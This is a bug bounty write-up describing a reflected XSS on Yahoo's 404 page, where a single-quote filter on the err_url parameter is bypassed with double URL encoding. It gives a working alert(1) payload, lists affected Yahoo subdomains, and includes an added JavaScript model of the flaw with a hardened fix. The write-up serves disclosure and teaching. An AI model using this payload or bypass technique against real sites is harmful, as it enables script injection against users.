Hey everybody,

Today I will talk about the XSS that I found on the main Yahoo domains, and I was really amazed that no one had discovered it before, given that they have fixed more than 1741 security bugs.

First of all, I'd like to mention that this was my first challenge on a bug bounty program, and I successfully bypassed it.

Let's see what I did in this challenge (CTF style) 😀

This is the starting point. I went to yahoo.com and tried to guess files or directories, e.g. yahoo.com/7amama. Because 7amama didn't exist, I landed on a 404 page, but the page was here:

yahoo.com/?err=404&err_url=https://www.yahoo.com/7amama

I found two parameters in this URL. I had to test the second one, because when I changed the first one I was redirected away from the page; when I changed the second one, I found it reflected in the response page… Great.

By changing the value to http://attacker.com and searching for the string "attacker.com" in the source code, I found it reflected in two places: first in an anchor tag and second in JavaScript code (for this code… nice to meet you 😀).

I tried to test for XSS by injecting a single quote into my input; here is the reflected value in the JS code.

The server replaced my single quote with an & sequence. Because I love PHP, I guessed the scenario on the backend: they were searching for single quotes, but I wasn't sure until then. As another check I sent the URL-encoded form of my payload (the single quote) as %27 and checked the source code, and found the same result. 😦

Maybe there was no XSS, but how did they know that %27 is the URL encoding of a single quote? Maybe they were URL-decoding on the backend server, in other words decoding the value before the quote filter runs.

I left this challenge several times, and finally decided to understand what was happening there; it was not important to find a bug 🙂.

Like CTF challenges: most of the time I didn't solve the challenges, but I learned a lot from CTFs by researching the problems.

Again, I tried injecting with double URL encoding, turning the single quote into %25%32%37, sent my request, and was happy to find this result in the source code. The first decode turns %25%32%37 into %27, which contains no quote and so passes the filter, and a second decode turns %27 into the quote itself.

I thought I had done it: I had closed the single quote. You may ask yourself, "Why didn't I try to close the script tag and execute my code directly?" I will answer: "No way for this scenario 😀".

Now it is time to build our payload according to this mechanism. I want this payload to bypass the filter: http://attacker.com'-alert(1)-'7amama. Let's see which parts get through as-is and how to bypass the filter for the rest.

http://attacker.com => passes the filter as-is
' => blocked, so it is sent as %25%32%37 (double URL encoding)
- => passes
7amama => passes

Final payload: http://attacker.com%25%32%37-alert(1)-%25%32%377amama
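To make the decode/filter/decode mechanism concrete, here is an added example (it is not Yahoo's code and is not from the original post). It models the pipeline the post observed as three assumed stages: the server URL-decodes err_url once, a filter neutralises single quotes (the exact entity used is an assumption, the post only saw an & sequence), and the value is URL-decoded a second time before being written into a JavaScript string. It rebuilds the post's final payload from its plain form, shows why %27 is blocked while %25%32%37 gets through, and contrasts this with a hardened renderer that decodes fully before escaping for the JavaScript context.

```javascript
// Added example, not Yahoo's code: a simplified model of the pipeline the
// post observed. Stage names and the entity used by the filter are assumptions.

// Stage 1 (assumed): the server URL-decodes the query-string value once.
function decodeOnce(value) {
  return decodeURIComponent(value);
}

// Stage 2 (assumed): the quote filter. The post only saw an "&" sequence in
// place of the quote, so the exact entity here is an assumption.
function neutraliseQuotes(value) {
  return value.replace(/'/g, "&#39;");
}

// Stage 3 (assumed): a second decode, then insertion into a JS string literal.
function renderScriptVulnerable(value) {
  return "var err_url = '" + decodeURIComponent(value) + "';";
}

// The whole vulnerable pipeline, from raw query-string value to script text.
function vulnerablePipeline(rawParam) {
  return renderScriptVulnerable(neutraliseQuotes(decodeOnce(rawParam)));
}

// Percent-encode every character of a string. encodeURIComponent is not
// used because it leaves the apostrophe unencoded.
function percentEncodeAll(s) {
  return Array.from(s, (c) =>
    "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")
  ).join("");
}

// Encode a character twice, the way the post's %25%32%37 was built:
// "'" -> "%27" -> "%25%32%37" (the %, 2 and 7 are each encoded again).
function doubleEncodeChar(ch) {
  return percentEncodeAll(percentEncodeAll(ch));
}

// Rebuild the post's final payload from http://attacker.com'-alert(1)-'7amama.
function buildPayload() {
  const q = doubleEncodeChar("'");
  return "http://attacker.com" + q + "-alert(1)-" + q + "7amama";
}

// Hardened version: decode until the value stops changing (bounded, and
// stopping on malformed input), and only THEN escape for the JS context.
function decodeFully(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break; // malformed %-sequence: keep the text as it is
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

function renderScriptSafe(rawParam) {
  const plain = decodeFully(rawParam);
  // JSON.stringify escapes quotes and backslashes; "<" and the Unicode line
  // separators are escaped too so the literal cannot break out of <script>.
  const literal = JSON.stringify(plain)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return "var err_url = " + literal + ";";
}

// Walk-through of the three cases discussed in the post.
console.log(vulnerablePipeline("http://attacker.com%27-alert(1)-%277amama")); // quote neutralised
console.log(vulnerablePipeline(buildPayload()));                               // string literal closed
console.log(renderScriptSafe(buildPayload()));                                 // quote kept inside the literal
```

The hardened renderer fixes two things at once: filtering happens on the fully decoded value, so a second decode cannot resurrect a quote, and the escaping is specific to the JavaScript string context rather than a blacklist of one character.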

And here is the result:

The previous attack was on the yahoo.com domain; when I checked the other main domains I found all of them vulnerable to this XSS, e.g.:

hk.yahoo.com, nz.yahoo.com, au.yahoo.com, uk.yahoo.com, ca.yahoo.com, att.yahoo.com, ie.yahoo.com, frontier.yahoo.com, in.yahoo.com, tikona.yahoo.com, es.yahoo.com, ………

Now, you are going to look at my Yahoo XSS gallery 😀

Here is my PoC video for Yahoo:

Happy Hacking …

Thank you

@dia2diab